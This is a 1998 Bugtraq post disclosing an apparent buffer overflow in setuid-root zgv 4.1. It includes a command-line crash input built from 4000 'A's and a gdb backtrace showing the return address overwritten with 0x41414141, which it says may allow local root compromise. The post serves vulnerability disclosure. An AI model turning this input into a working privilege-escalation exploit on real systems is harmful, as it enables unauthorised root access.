[8142] in bugtraq

Overflow in zgv-4.1?

daemon@ATHENA.MIT.EDU (onix)
Thu Oct 8 22:58:13 1998

Date: Thu, 8 Oct 1998 00:08:13 -0500
Reply-To: onix <onix@AUTOBAHN.MB.CA>
From: onix <onix@AUTOBAHN.MB.CA>
To: BUGTRAQ@NETSPACE.ORG

Possible security risk in setuid zgv 4.1 which may lead to local root
compromise.  zgv is installed setuid root by default.

onix# zgv -a "`perl -e 'print "A" x 4000'`%s"
Segmentation fault (core dumped)
onix# gdb -c core
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (i486-slackware-linux), Copyright 1996 Free Software Foundation,
Inc.
Core was generated by `zgv -a
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x40121a48 in ?? ()
(gdb) backtrace
#0  0x40121a48 in ?? ()
#1  0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb)